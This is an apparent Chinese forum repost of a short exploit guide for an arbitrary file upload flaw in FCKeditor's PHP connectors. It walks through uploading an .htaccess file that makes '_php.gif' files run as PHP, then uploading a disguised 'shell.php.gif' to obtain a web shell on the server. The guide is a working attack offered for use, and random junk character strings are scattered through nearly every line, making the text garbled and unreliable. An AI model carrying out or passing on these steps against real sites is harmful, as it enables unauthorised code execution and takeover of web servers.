FCKeditor所有php版本Upload上传漏洞
2 x" O. k6 o. o( Q/ D作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:070 {- V* t. c6 a6 G6 P/ ?
减小字体 增大字体" ~: L2 G# m8 j( F
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability# ^( ?7 @# j! K+ {
[+] Date: 2011
) D* Y- ~9 A8 m+ c) I: X0 `5 u[+] Author : sinesafe.cn
. r& m6 n7 A$ _+ H[+] Website : WwW.sinesafe.cn
( s9 l3 C# p4 t V———————————————————
" {* w+ ^( Q# K0 l& y1.create a htaccess file:
" ^3 Q5 ` f) O. Tcode:
5 O6 U7 q4 Y% W: _<FilesMatch “_php.gif”>; `3 G3 V# z0 u9 X9 P3 b% E9 Z: V
SetHandler application/x-httpd-php6 M) [3 `. w- o
</FilesMatch>3 X+ m5 a( t- k8 E
, O1 |4 V, q% T d
2.Now upload this htaccess with FCKeditor.: M& P7 q* Z- O0 E. |) F
0 `( V$ k2 Z n8 c3 A4 [5 ohttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
: l; K8 t' x! D7 R+ W. g
1 X4 Q/ U- w: V5 S4 Nhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html
5 m9 X( e* K1 u0 F; L) Y2 ~! O( C! H" U% k
———————————————————————————————-! P, S) a& N2 w( z3 `* C6 q
3.Now upload shell.php.gif with FCKeditor.; s& f5 f5 x2 S* ?% ?- x
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.9 W8 t# t+ V" j0 G j/ ~! q
5.http://www.sinesafe.cn/anything/shell_php.gif O/ j U) `; s+ b' R8 L9 O7 l
6.Now shell is available from server. |
! P1 `; E) n; q" u' Z8 T
7 O6 f( ]6 H8 j6 s, B+ h2 \5 A
! l6 d6 t( p( J+ d' F2 w/ `) [
|
发表于 2013-10-27 17:25:21
收藏
支持
反对